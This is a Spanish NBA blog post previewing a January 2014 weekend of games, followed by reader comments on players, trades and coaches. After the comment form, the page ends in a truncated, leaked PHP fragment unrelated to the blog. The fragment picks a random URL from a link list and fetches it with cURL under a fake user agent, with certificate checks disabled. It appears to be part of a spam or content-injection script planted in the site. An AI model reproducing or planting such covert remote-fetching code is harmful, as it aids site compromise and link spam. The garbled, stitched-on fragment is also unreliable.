Fin de semana: Sois los amos

31 de January de 2014 por TheDeerHunter

Menor carga de partidos que en otras ocasiones, especialmente el domingo que únicamente tendremos uno.

Para abrir boca hoy 8, y los dos más atractivos se solapan a las 2AM. Podéis optar a la visita de los Grizzlies a Minnesotta con cierto sabor ibérico y con la liebre recién soltada del rumor de Love a Lakers en 2015. Parecida fiabilidad al que se dijo en su día de Paul George y que terminara con unas cifras muy majas en su renovación con Pacers. El otro casi es un “must see”, porque ahora mismo existen pocos espectáculos como ver a Durant en pleno despliegue asesino. Además visita Brooklyn, cuyo equipo ya no son la madre que eran los meses anteriores. El tercer choque destacado, a las 3AM, es un Raptors@Nuggets donde habrá que ver si DeRozan puede estrenar su condición de all-star. El resto, poco más aprovechable. Quizá el Hawks@Sixers si queréis. Pero todo lo demás nos lo podemos ahorrar.

Saturday night será la noche grande. Cantidad pero veremos si también calidad. Abrirán también con dos platos fuertes solapados. 1AM, Nets@Pacers y menudo papelón tienen los de Brooklyn. También el Thunder@Wizards, otra visita difícil para los líderes del oeste (miento, de la liga ahora mismo) Después un Wolves@Hawks a ver si los lobitos comienzan a carburar fuera de casa. 2:30AM momento señalado. El siempre apasionante duelo Melo vs LeBron, con el vigente MVP escocido después de ceder ante Durant. También un Raptors@Blazers, en el segundo partido de la gira de los canadienses por el oeste.

Esto es lo más destacable, aunque ya sabéis que estáis invitados a ver (y comentar) todos los demás partidos.

Finalmente, el domingo el único partido será el Magic@Celtics, a las 18 horas de aquí.

Eso es todo. Como siempre, que disfrutéis mucho del fin de semana y veamos buen baloncesto.

Comenta

15 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Se acabó la racha de partidos con >30 puntos para el señor Durant y ahora habrá que poner la mirada en ver hasta qué número llegan las victorias consecutivas de Oklahoma.Les toca fuera en la capital,y luego dos partidos en casa contra Memphis (excelente piedra de toque) y Minnesota,fuera contra Orlando y cierran la semana contra los Knicks en el duelo de pistoleros Durant-Melo.Inmaculada serie de Air Congo con 12-12 en TC en un partido que pensaba que iban a pasar las de cain para ganar,y en realidad estaba finiquitado en la primera parte.

      Citar

  2. Ruxixon dice:
    #2

    Por cierto,ojo al partido de Al Jefferson reclamando sangre por su no llamada al All Star: 40 puntos y 18 rebotes.¿Su rival? Los Lakers,OK,pero las 3 semanas que lleva “Big Al” tienen tela.

      Citar

  3. jhc dice:
    #3

    Fácil victoria de los Hawks con una gran actuación coral de todo el equipo, especial mención al juego interior formado por Brand y Scott 18-8 y 18-9 respectivamente, hasta 7 jugadores tuvieron los hawks en dobles digitos, por parte de los sixers destacar los 29-8 con 5 robos de Young que de nada sirvieron

      Citar

  4. Ruxixon dice:
    #4

    Otra noticia,en este caso totalmente desagradable,la temida lesión del ACL en otro PG,en esta ocasión Nate Robinson (el partido fue el miércoles,la confirmación de la rotura ayer).Una pena perdernos a un jugador como Nate de las canchas.

      Citar

  5. Luis H. dice:
    #5

    Y otro que lleva semanas a un nivel impresionante es Stephen Curry, bastante mejor ahora que su Splash Brother. Ayer, aunque fueran los Jazz, metió los suyos y los de David Lee: 44 pts con 8 de 13 en triples y 14 de 26 en tiros, 4 asistencias. Bogut también creciendo, 16-17 y 3 tapones ayer. Ojo si sigue a este nivel

      Citar

  6. nba dice:
    #6

    en fin y pensar que los Lakers no necesitaban ejercer el tankeo para conseguir buenos jugadores, pero parece que esto va a ser una agonia continua, como es posible que D’antoni siga en el puesto

      Citar

  7. Ruxixon dice:
    #7

    nba:
    en fin y pensar que los Lakers no necesitaban ejercer el tankeo para conseguir buenos jugadores, pero parece que esto va a ser una agonia continua, como es posible que D’antoni siga en el puesto

    El contrato de Kobe les limita a hacer un equipo competitivo el año que viene,algo que deberán presentar pues el contrato televisivo habrá que justificarlo de alguna manera -ha bajado un 37 % respecto a la temporada pasada los ratings-.Que mejor vía que el draft y que mejor entrenador que D’Antoni para conseguirlo.

      Citar

  8. Denise dice:
    #8

    nba:
    en fin y pensar que los Lakers no necesitaban ejercer el tankeo para conseguir buenos jugadores, pero parece que esto va a ser una agonia continua, como es posible que D’antoni siga en el puesto

    D’antoni tiene su parte de culpa, pero los culpables son los dueños y el GM por firmarle ese contrato al egoista de Kobe que antepone el dinero a la posibilidad de conseguir otro anillo e igualar a Jordan.
    Así de bonita y ciclica es la NBA y los deportes americanos, afortunadamente no es la puta mierda del futbol europeo donde siempre ganan los mismos, fichan a base de talonario y los grandes jugadores nunca los vas a ver jugando en un Rayo Vallecano ó un Almería, como si puedes ver a grandes jugadores de la NBA jugando en equipos “modestos” ó con menos nombre.
    Los fans de Lakers solo debeis esperar 2 años hasta que Kobe se retire e intentar fichar a Durant como FA.

      Citar

  9. rumbero dice:
    #9

    Ojito que según Wojnarowski los Pacers están cerca de firmar a la flamenca de Bynum. Mejor tener esa cabecita en casa que en Miami?

      Citar

  10. Lucho dice:
    #10

    Bynum nuevo jugador Pacer.
    Scola-Bynum, terrible dupla interior suplente. La mejor por mucho, es mas creo que nunca vi una de ese nivel. No recuerdo, al menos

      Citar

  11. Ruxixon dice:
    #11

    Lucho:
    Bynum nuevo jugador Pacer.
    Scola-Bynum, terrible dupla interior suplente. La mejor por mucho,es mas creo que nunca vi una de ese nivel. No recuerdo, al menos

    El vividor de Bynum aparte de llenarse los bolsillos de millones puede además ganarse otro anillo,la suerte que tienen algunos.A ver como encaja en esa filososfía de trabajo que hay allí.Desde mi bando,veo complicadísimo con este movimiento que Miami pueda meter mano a Indiana.

      Citar

  12. Denise dice:
    #12

    Gran fichaje para Indiana, “solo” cobrará 1 millón por lo que si juega medianamente con regularidad va a dar mucho mas rendimiento que cualquier pivot que esté ahora mismo libre, y si se vuelve a lesionar ó da problemas, el riesgo es menor. Además, no creo que Bynum la líe y estará motivado a tope. Tras sus líos en Philly y Cavs, si no está motivado en un equipo que va a aspirar al anillo, apaga y vamonos, supongo que nadie volvería a morder el anzuelo y en verano nadie querría contratarle. Dicho de otra forma, este es el último tren de Bynum para reengancharse a la liga.

      Citar

  13. Denise dice:
    #13

    Denise:
    Dicho de otra forma, este es el último tren de Bynum para reengancharse a la liga.

    Y otro que toma su último tren para reengarcharse es Shannon Brown fichando por los Spurs. A mi en Lakers me gustaba mucho, y tenía desparpajo para tirar y echarse el equipo a las espaldas en determinados momentos. Así a bote pronto recuerdo un Lakers – Orlando en el que Kobe Bryant hizo el peor partido en directo que le he visto en modo lanzapiedras ON y fue Brown el que cogió los mandos y se hinchó a meter puntos.

    En definitiva, creo que Popovych puede sacarle buen partido a este hombre.

      Citar

  14. Ruxixon dice:
    #14

    Vaya problemas ha dado el blog para entrar hoy…en fin,si antes hablaba de la racha de Oklahoma,antes se corta,jajaj.

      Citar

  15. Denise dice:
    #15

    El balance defensivo de Orlando es de chiste, Vaughn tiene todas las herramientas para trabajar esto, porque otra cosa no tendrán los Magic, pero fisico tienen para aburrir y es una vergüenza como defienden. Por favor, echad a este pseudoentrenador y traed a Mcmillan!!

    Aun así, los Celtics son tan malos que el choque todavía está vivo, veremos a ver que ocurre en la 2º mitad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>